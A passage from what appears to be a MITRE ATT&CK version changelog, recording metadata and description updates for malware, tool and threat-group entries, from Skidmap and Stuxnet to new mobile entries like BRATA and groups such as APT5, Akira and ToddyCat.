x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0468] Skidmap

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-06-26 04:03:50.568000+00:002024-04-11 00:06:31.222000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0633] Sliver

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-01-17 22:14:02.852000+00:002024-04-11 00:06:01.264000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0226] Smoke Loader

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 21:43:37.366000+00:002024-04-11 00:04:55.094000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3

[S0374] SpeakUp

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 16:41:33.128000+00:002024-04-11 00:02:59.341000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S1030] Squirrelwaffle

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-26 21:08:39.890000+00:002024-04-11 00:02:15.805000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0380] StoneDrill

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:15:28.897000+00:002024-04-11 00:00:54.356000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0491] StrongPity

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-10-15 02:00:29.185000+00:002024-04-10 23:47:16.416000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0603] Stuxnet

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-20 13:50:55.168000+00:002024-04-10 23:46:32.577000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4

[S0663] SysUpdate

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-20 16:32:21.733000+00:002024-04-10 23:44:19.752000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0131] TINYTYPHON

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_aliases['TINYTYPHON']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002024-04-10 22:32:05.321000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0263] TYPEFRAME

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-26 20:22:31.288000+00:002024-04-10 22:26:03.638000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3

[S0011] Taidoor

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 12:34:22.853000+00:002024-04-10 22:36:03.362000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version2.02.1

[S0057] Tasklist

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-12 21:30:23.536000+00:002024-02-12 19:14:37.984000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0665] ThreatNeedle

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-26 20:18:23.760000+00:002024-04-10 22:32:30.915000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0678] Torisma

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-21 11:45:38.621000+00:002024-04-10 22:31:28.094000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0266] TrickBot

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-09 16:44:56.511000+00:002024-04-10 22:28:21.746000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.12.2

[S0333] UBoatRAT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:24:01.572000+00:002024-04-10 22:22:03.759000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0136] USBStealer

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 22:53:27.639000+00:002024-04-10 22:17:40.838000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3

[S0022] Uroburos

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-02 17:26:25.052000+00:002024-04-10 22:18:48.304000+00:00
x_mitre_version2.02.1

[S0386] Ursnif

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 05:42:32.541000+00:002024-04-10 22:18:21.527000+00:00
external_references[5]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992https://web.archive.org/web/20210719165945/https://www.trendmicro.com/en_us/research/15/c/ursnif-the-multifaceted-malware.html?_ga=2.165628854.808042651.1508120821-744063452.1505819992
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.41.5

[S0257] VERMIN

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:26:04.840000+00:002024-04-10 22:17:02.480000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0180] Volgmer

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-26 20:40:35.183000+00:002024-04-10 22:16:05.440000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3

[S0612] WastedLocker

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-09-27 17:36:37.593000+00:002024-03-25 19:46:59.150000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0579] Waterbear

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-03-25 16:46:35.932000+00:002024-04-10 22:14:28.440000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0689] WhisperGate

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-05 20:48:07.280000+00:002024-04-10 22:13:49.349000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0466] WindTail

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 22:03:11.833000+00:002024-04-10 20:39:43.747000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0430] Winnti for Linux

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-07-01 18:34:02.367000+00:002024-04-10 20:36:12.150000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0141] Winnti for Windows

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-20 22:02:53.982000+00:002024-04-10 20:35:29.262000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.03.1

[S1065] Woody RAT

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-17 14:58:02.400000+00:002024-04-10 20:34:14.166000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.01.1

[S0388] YAHOYAH

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors['Bart Parys']
values_changed
STIX FieldOld valueNew Value
modified2023-03-23 15:24:22.256000+00:002024-04-19 13:19:32.736000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0230] ZeroT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:31:33.197000+00:002024-04-10 20:32:14.510000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0330] Zeus Panda

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 05:47:42.436000+00:002024-04-10 20:31:00.234000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4

[S0672] Zox

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-20 22:03:44.670000+00:002024-04-10 20:30:02.520000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.01.1

[S1013] ZxxZ

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_aliases['ZxxZ']
values_changed
STIX FieldOld valueNew Value
modified2022-06-02 12:27:58.811000+00:002024-04-10 20:29:50.729000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0032] gh0st RAT

Current version: 3.2

Version changed from: 3.1 → 3.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-20 22:03:44.666000+00:002024-02-06 19:00:45.557000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.13.2

[S1059] metaMain

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-05 14:09:42.670000+00:002024-04-11 00:45:31.029000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.01.1

[S0104] netstat

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2023-07-25 19:25:05.678000+00:002024-01-23 19:57:39.135000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3

[S0385] njRAT

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-20 20:03:22.206000+00:002024-04-11 00:33:37.539000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.51.6
Patches

[S0604] Industroyer

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-17 20:09:38.062000+00:002024-04-11 16:06:34.700000+00:00
x_mitre_contributors[0]Dragos Threat IntelligenceDragos Threat Intelligence

[S0276] Keydnap

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 14:35:31.022000+00:002024-01-10 15:18:40.400000+00:00
external_references[4]['url']https://www.synack.com/2017/01/01/mac-malware-2016/https://objective-see.org/blog/blog_0x16.html
x_mitre_attack_spec_version2.1.03.2.0

[S0109] WEBC2

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-08-25 21:23:24.223000+00:002023-12-26 19:55:54.848000+00:00
external_references[2]['url']https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.ziphttps://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
x_mitre_attack_spec_version2.1.03.2.0

mobile-attack

New Software

[S1095] AhRat

Current version: 1.0

Description: [AhRat](https://attack.mitre.org/software/S1095) is an Android remote access tool based on the open-source AhMyth remote access tool. [AhRat](https://attack.mitre.org/software/S1095) initially spread in August 2022 on the Google Play Store via an update containing malicious code to the previously benign application, “iRecorder – Screen Recorder”, which itself was released in September 2021.(Citation: welivesecurity_ahrat_0523)


[S1094] BRATA

Current version: 1.0

Description: [BRATA](https://attack.mitre.org/software/S1094) (Brazilian Remote Access Tool, Android), is an evolving Android malware strain, detected in late 2018 and again in late 2021. Originating in Brazil, [BRATA](https://attack.mitre.org/software/S1094) was later also found in the UK, Poland, Italy, Spain, and USA, where it is believed to have targeted financial institutions such as banks. There are currently three known variants of [BRATA](https://attack.mitre.org/software/S1094).(Citation: securelist_brata_0819)(Citation: cleafy_brata_0122)(Citation: mcafee_brata_0421)


[S1103] FlixOnline

Current version: 1.0

Description: [FlixOnline](https://attack.mitre.org/software/S1103) is an Android malware, first detected in early 2021, believed to target users of WhatsApp. [FlixOnline](https://attack.mitre.org/software/S1103) primarily spreads via automatic replies to a device’s incoming WhatsApp messages.(Citation: checkpoint_flixonline_0421)


[S1128] HilalRAT

Current version: 1.0

Description: [HilalRAT](https://attack.mitre.org/software/S1128) is a remote access-capable Android malware, developed and used by [UNC788](https://attack.mitre.org/groups/G1029).(Citation: Meta Adversarial Threat Report 2022) [HilalRAT](https://attack.mitre.org/software/S1128) is capable of collecting data, such as device location, call logs, etc., and is capable of executing actions, such as activating a device's camera and microphone.(Citation: Meta Adversarial Threat Report 2022)


[S1126] Phenakite

Current version: 1.0

Description: [Phenakite](https://attack.mitre.org/software/S1126) is a mobile malware that is used by [APT-C-23](https://attack.mitre.org/groups/G1028) to target iOS devices. According to several reports, [Phenakite](https://attack.mitre.org/software/S1126) was developed to fill a tooling gap and to target those who owned iPhones instead of Windows desktops or Android phones.(Citation: sentinelone_israel_hamas_war)(Citation: fb_arid_viper)

Minor Version Changes

[S0292] AndroRAT

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1[AndroRAT](https://attack.mitre.org/software/S0292) is malwat1[AndroRAT](https://attack.mitre.org/software/S0292) is an op
>re that allows a third party to control the device and colle>en-source remote access tool for Android devices. [AndroRAT]
>ct information. (Citation: Lookout-EnterpriseApps)>(https://attack.mitre.org/software/S0292) is capable of coll
 >ecting data, such as device location, call logs, etc., and i
 >s capable of executing actions, such as sending SMS messages
 > and taking pictures.(Citation: Lookout-EnterpriseApps)(Cita
 >tion: github_androrat)(Citation: Forcepoint BITTER Pakistan 
 >Oct 2016) It is originally available through the `The404Hack
 >ing` Github repository.(Citation: github_androrat)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_aliases['AndroRAT']
x_mitre_deprecatedFalse
x_mitre_platforms['Android']
external_referenceshttps://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002024-04-16 21:01:50.792000+00:00
description[AndroRAT](https://attack.mitre.org/software/S0292) is malware that allows a third party to control the device and collect information. (Citation: Lookout-EnterpriseApps)[AndroRAT](https://attack.mitre.org/software/S0292) is an open-source remote access tool for Android devices. [AndroRAT](https://attack.mitre.org/software/S0292) is capable of collecting data, such as device location, call logs, etc., and is capable of executing actions, such as sending SMS messages and taking pictures.(Citation: Lookout-EnterpriseApps)(Citation: github_androrat)(Citation: Forcepoint BITTER Pakistan Oct 2016) It is originally available through the `The404Hacking` Github repository.(Citation: github_androrat)
external_references[1]['source_name']AndroRATForcepoint BITTER Pakistan Oct 2016
external_references[1]['description'](Citation: Lookout-EnterpriseApps)Dela Paz, R. (2016, October 21). BITTER: a targeted attack against Pakistan. Retrieved June 1, 2022.
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'github_androrat', 'description': 'The404Hacking. (n.d.). AndroRAT. Retrieved April 8, 2024.', 'url': 'https://web.archive.org/web/20221013124327/https://github.com/The404Hacking/AndroRAT'}

[S0289] Pegasus for iOS

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[Pegasus for iOS](https://attack.mitre.org/software/S0289) it1[Pegasus for iOS](https://attack.mitre.org/software/S0289) i
>s the iOS version of malware that has reportedly been linked>s the iOS version of malware that has reportedly been linked
> to the NSO Group. It has been advertised and sold to target> to the NSO Group. It has been advertised and sold to target
> high-value victims. (Citation: Lookout-Pegasus) (Citation: > high-value victims.(Citation: Lookout-Pegasus)(Citation: Pe
>PegasusCitizenLab) The Android version is tracked separately>gasusCitizenLab) The Android version is tracked separately u
> under [Pegasus for Android](https://attack.mitre.org/softwa>nder [Pegasus for Android](https://attack.mitre.org/software
>re/S0316).>/S0316).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002024-04-06 00:01:53.588000+00:00
description[Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. It has been advertised and sold to target high-value victims. (Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316).[Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. It has been advertised and sold to target high-value victims.(Citation: Lookout-Pegasus)(Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316).
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0507] eSurv

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-09-14 15:39:17.698000+00:002024-03-29 15:07:58.675000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

ics-attack

Minor Version Changes

[S0496] REvil

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-26 20:06:33.317000+00:002024-04-11 00:15:32.724000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.12.2

[S0603] Stuxnet

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-20 13:50:55.168000+00:002024-04-10 23:46:32.577000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4

[S1009] Triton

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-11-23 14:27:54.711000+00:002024-04-17 16:12:43.754000+00:00
x_mitre_attack_spec_version3.0.03.2.0
x_mitre_version1.01.1

[S1010] VPNFilter

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-12 18:30:51.174000+00:002024-03-07 18:57:15.800000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1
Patches

[S0604] Industroyer

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-17 20:09:38.062000+00:002024-04-11 16:06:34.700000+00:00
x_mitre_contributors[0]Dragos Threat IntelligenceDragos Threat Intelligence

Groups

enterprise-attack

New Groups

[G1028] APT-C-23

Current version: 1.0

Description: [APT-C-23](https://attack.mitre.org/groups/G1028) is a threat group that has been active since at least 2014.(Citation: symantec_mantis) [APT-C-23](https://attack.mitre.org/groups/G1028) has primarily focused its operations on the Middle East, including Israeli military assets. [APT-C-23](https://attack.mitre.org/groups/G1028) has developed mobile spyware targeting Android and iOS devices since 2017.(Citation: welivesecurity_apt-c-23)


[G1023] APT5

Current version: 1.0

Description: [APT5](https://attack.mitre.org/groups/G1023) is a China-based espionage actor that has been active since at least 2007 primarily targeting the telecommunications, aerospace, and defense industries throughout the U.S., Europe, and Asia. [APT5](https://attack.mitre.org/groups/G1023) has displayed advanced tradecraft and significant interest in compromising networking devices and their underlying software including through the use of zero-day exploits.(Citation: NSA APT5 Citrix Threat Hunting December 2022)(Citation: Microsoft East Asia Threats September 2023)(Citation: Mandiant Pulse Secure Zero-Day April 2021)(Citation: Mandiant Pulse Secure Update May 2021)(Citation: FireEye Southeast Asia Threat Landscape March 2015)(Citation: Mandiant Advanced Persistent Threats)


[G1024] Akira

Current version: 1.0

Description: [Akira](https://attack.mitre.org/groups/G1024) is a ransomware variant and ransomware deployment entity active since at least March 2023.(Citation: Arctic Wolf Akira 2023) [Akira](https://attack.mitre.org/groups/G1024) uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly-available tools and techniques for lateral movement.(Citation: Arctic Wolf Akira 2023)(Citation: Secureworks GOLD SAHARA) [Akira](https://attack.mitre.org/groups/G1024) operations are associated with "double extortion" ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of [Akira](https://attack.mitre.org/software/S1129) ransomware indicates multiple overlaps with and similarities to [Conti](https://attack.mitre.org/software/S0575) malware.(Citation: BushidoToken Akira 2023)


[G1021] Cinnamon Tempest

Current version: 1.0

Description: [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) is a China-based threat group that has been active since at least 2021 deploying multiple strains of ransomware based on the leaked [Babuk](https://attack.mitre.org/software/S0638) source code. [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) does not operate their ransomware on an affiliate model or purchase access but appears to act independently in all stages of the attack lifecycle. Based on victimology, the short lifespan of each ransomware variant, and use of malware attributed to government-sponsored threat groups, [Cinnamon Tempest](https://attack.mitre.org/groups/G1021) may be motivated by intellectual property theft or cyberespionage rather than financial gain.(Citation: Microsoft Ransomware as a Service)(Citation: Microsoft Threat Actor Naming July 2023)(Citation: Trend Micro Cheerscrypt May 2022)(Citation: SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022)


[G1026] Malteiro

Current version: 1.0

Description: [Malteiro](https://attack.mitre.org/groups/G1026) is a financially motivated criminal group that is likely based in Brazil and has been active since at least November 2019. The group operates and distributes the [Mispadu](https://attack.mitre.org/software/S1122) banking trojan via a Malware-as-a-Service (MaaS) business model. [Malteiro](https://attack.mitre.org/groups/G1026) mainly targets victims throughout Latin America (particularly Mexico) and Europe (particularly Spain and Portugal).(Citation: SCILabs Malteiro 2021)


[G1020] Mustard Tempest

Current version: 1.0

Description: [Mustard Tempest](https://attack.mitre.org/groups/G1020) is an initial access broker that has operated the [SocGholish](https://attack.mitre.org/software/S1124) distribution network since at least 2017. [Mustard Tempest](https://attack.mitre.org/groups/G1020) has partnered with [Indrik Spider](https://attack.mitre.org/groups/G0119) to provide access for the download of additional malware including LockBit, [WastedLocker](https://attack.mitre.org/software/S0612), and remote access tools.(Citation: Microsoft Ransomware as a Service)(Citation: Microsoft Threat Actor Naming July 2023)(Citation: Secureworks Gold Prelude Profile)(Citation: SocGholish-update)


[G1022] ToddyCat

Current version: 1.0

Description: [ToddyCat](https://attack.mitre.org/groups/G1022) is a sophisticated threat group that has been active since at least 2020 using custom loaders and malware in multi-stage infection chains against government and military targets across Europe and Asia.(Citation: Kaspersky ToddyCat June 2022)(Citation: Kaspersky ToddyCat Check Logs October 2023)

Major Version Changes

[G0007] APT28

Current version: 5.0

Version changed from: 4.0 → 5.0


Old Description
New Description
t1[APT28](https://attack.mitre.org/groups/G0007) is a threat gt1[APT28](https://attack.mitre.org/groups/G0007) is a threat g
>roup that has been attributed to Russia's General Staff Main>roup that has been attributed to Russia's General Staff Main
> Intelligence Directorate (GRU) 85th Main Special Service Ce> Intelligence Directorate (GRU) 85th Main Special Service Ce
>nter (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub>nter (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub
> August 2020)(Citation: Cybersecurity Advisory GRU Brute For> August 2020)(Citation: Cybersecurity Advisory GRU Brute For
>ce Campaign July 2021) This group has been active since at l>ce Campaign July 2021) This group has been active since at l
>east 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: >east 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: 
>Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike >Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike 
>DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWork>DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWork
>s TG-4127)(Citation: FireEye APT28 January 2017)(Citation: G>s TG-4127)(Citation: FireEye APT28 January 2017)(Citation: G
>RIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation:>RIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation:
> Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018> Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018
>)(Citation: ESET Zebrocy May 2019)  [APT28](https://attack.m>)(Citation: ESET Zebrocy May 2019)  [APT28](https://attack.m
>itre.org/groups/G0007) reportedly compromised the Hillary Cl>itre.org/groups/G0007) reportedly compromised the Hillary Cl
>inton campaign, the Democratic National Committee, and the D>inton campaign, the Democratic National Committee, and the D
>emocratic Congressional Campaign Committee in 2016 in an att>emocratic Congressional Campaign Committee in 2016 in an att
>empt to interfere with the U.S. presidential election. (Cita>empt to interfere with the U.S. presidential election.(Citat
>tion: Crowdstrike DNC June 2016) In 2018, the US indicted fi>ion: Crowdstrike DNC June 2016) In 2018, the US indicted fiv
>ve GRU Unit 26165 officers associated with [APT28](https://a>e GRU Unit 26165 officers associated with [APT28](https://at
>ttack.mitre.org/groups/G0007) for cyber operations (includin>tack.mitre.org/groups/G0007) for cyber operations (including
>g close-access operations) conducted between 2014 and 2018 a> close-access operations) conducted between 2014 and 2018 ag
>gainst the World Anti-Doping Agency (WADA), the US Anti-Dopi>ainst the World Anti-Doping Agency (WADA), the US Anti-Dopin
>ng Agency, a US nuclear facility, the Organization for the P>g Agency, a US nuclear facility, the Organization for the Pr
>rohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemi>ohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemic
>cals Laboratory, and other organizations.(Citation: US Distr>als Laboratory, and other organizations.(Citation: US Distri
>ict Court Indictment GRU Oct 2018) Some of these were conduc>ct Court Indictment GRU Oct 2018) Some of these were conduct
>ted with the assistance of GRU Unit 74455, which is also ref>ed with the assistance of GRU Unit 74455, which is also refe
>erred to as [Sandworm Team](https://attack.mitre.org/groups/>rred to as [Sandworm Team](https://attack.mitre.org/groups/G
>G0034). >0034). 
Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-26 17:51:20.401000+00:002024-04-04 19:07:48.903000+00:00
description[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). [APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE 